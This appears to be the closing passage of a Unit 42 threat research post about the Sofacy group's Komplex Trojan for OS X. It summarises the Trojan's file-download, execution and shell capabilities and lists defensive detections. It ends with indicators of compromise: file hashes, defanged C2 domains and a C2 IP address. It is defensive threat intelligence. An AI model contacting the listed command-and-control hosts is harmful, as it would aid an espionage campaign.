The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system -- a move that showcases their continued evolution toward multi-platform attacks. The tool is capable of downloading additional files to the system, executing and deleting files, as well as directly interacting with the system shell. While detailed targeting information is not currently available, we believe Komplex has been used in attacks on individuals related to the aerospace industry, as well as attacks leveraging an exploit in MacKeeper to deliver the Trojan. The Komplex Trojan revealed a design similar to Sofacy's Carberp variant Trojan, which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease.

While Unit 42 continues to research and track this threat, Palo Alto Networks customers are protected via the following:

* WildFire correctly identifies known Komplex executables as malicious
* IPS signature #14442 Sofacy.Gen Command And Control Traffic can detect and block outbound C2 requests generated by the Komplex Trojan.
* Customers can track this Trojan via the [Komplex](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Komplex) tag in AutoFocus.

### IOCs:

**Hashes:** 2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134  
c1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7  
cffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4  
96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3  
227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5  
45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54

**C2 Locations:** appleupdate\[.\]org  
apple-iclouds\[.\]net  
itunes-helper\[.\]net  
185\.10.58.170
Back to top

### Tags

* [Aerospace](https://unit42.paloaltonetworks.com/tag/aerospace/ "aerospace")
* [Fighting Ursa](https://unit42.paloaltonetworks.com/tag/fighting-ursa/ "Fighting Ursa")
* [Komplex](https://unit42.paloaltonetworks.com/tag/komplex/ "Komplex")
* [OS X](https://unit42.paloaltonetworks.com/tag/os-x/ "OS X")
* [Sofacy](https://unit42.paloaltonetworks.com/tag/sofacy/ "Sofacy")
* [Trojan](https://unit42.paloaltonetworks.com/tag/trojan/ "Trojan")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player](https://unit42.paloaltonetworks.com/unit42-palo-alto-networks-researcher-discovers-eight-critical-vulnerabilities-in-adobe-flash-player/ "Palo Alto Networks Researcher Discovers Eight Critical Vulnerabilities in Adobe Flash Player")

### Related Articles

* [2026 World Cup: Discussing The World's Biggest Game's Attack Surface](https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/ "article - table of contents")
* [Inside AD CS Escalation: Unpacking Advanced Misuse Techniques and Tools](https://unit42.paloaltonetworks.com/active-directory-certificate-services-exploitation/ "article - table of contents")
* [Threat Brief: Widespread Impact of the Axios Supply Chain Attack](https://unit42.paloaltonetworks.com/axios-supply-chain-attack/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of a magnifying glass illuminating a glowing orange circular digital circuit interface on a dark, high-tech background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Myth-Busting_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) September 16, 2026 [#### Atomic macOS (AMOS) Stealer Activity](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/)

* [MacOS](https://unit42.paloaltonetworks.com/tag/macos/ "macOS")

* [Threat intelligence](https://unit42.paloaltonetworks.com/tag/threat-intelligence/ "threat intelligence")

* [Unit 42](https://unit42.paloaltonetworks.com/tag/unit-42/ "Unit 42")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/ "Atomic macOS (AMOS) Stealer Activity")  
  ![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/unit42/respond/managed-detection-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/prepare-for-emerging-risks/continuous-frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
